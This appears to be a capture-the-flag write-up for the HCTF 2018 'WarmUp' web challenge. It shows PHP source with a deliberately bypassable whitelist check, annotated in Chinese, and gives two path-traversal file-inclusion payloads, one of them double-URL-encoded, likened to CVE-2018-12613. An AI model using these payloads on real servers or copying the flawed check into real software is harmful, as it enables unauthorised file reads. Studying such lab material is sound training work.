buuctf web [HCTF 2018]WarmUp

buuctf shooting range: https://buuoj.cn/

---

Open the title and find a big face

Check the source code of the page and find a comment

Visit source.php, you can see the following source code and analyze it:

 <?php
    highlight_file(__FILE__);
    class emmm
    {
    
    
        public static function checkFile(&$page)
        {
    
    
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//$whitelist数组存入两个变量
            if (! isset($page) || !is_string($page)) {
    
    
            //判断是否存在且是否为字符串类型
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
    
    
            //判断与$whitelist是否匹配，不过很显然，我们不能在这里return，应为我们要的flag不在这两个文件中，当然，在这里还是能进行绕过的，下面会详细讲解
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page. '?', '?')//查找?出现在字符串中首次出现的位置
            );
            //截取字符串开始到?的位置，赋值到$_page变量中
            //很显然，这里就可以绕过获取flag了
            
			            

            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);//以上条件不成立，先进行一次url解码
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );//解码后重新再截取字符串开始到?的位置，赋值到$_page变量中
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])//判断是否存在file变量
        && is_string($_REQUEST['file'])//判断file是否为字符串
        && emmm::checkFile($_REQUEST['file'])//将file变量带入emmm类里的checkFile执行
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

Give a hint when hint.php is included, the flag is in the ffffllllaaaaggggfile

Analyzing the above code, there are two solutions

1. When the first mb_substr is verified, you can bypass the acquisition of the flag. We only need to add one after source.php ?, and then assign the intercepted string to $_page for verification, and then use.../return The parent directory contains flags.

payload:

source.php?file=source.php?/../../../../ffffllllaaaagggg

2. It can also be bypassed in the second mb_substr

payload:

/source.php?file=source.php%253f/../../../../../ffffllllaaaagggg

1. %25 is a percent sign %, %3furl is decoded as a question mark?
2. The browser will decode the URL once for us, and decode %25 into %.
3. Then bring it into the php code for execution, there will be a urldecode to decode %3f into a question mark?

This question is CVE-2018-12613similar to the vulnerability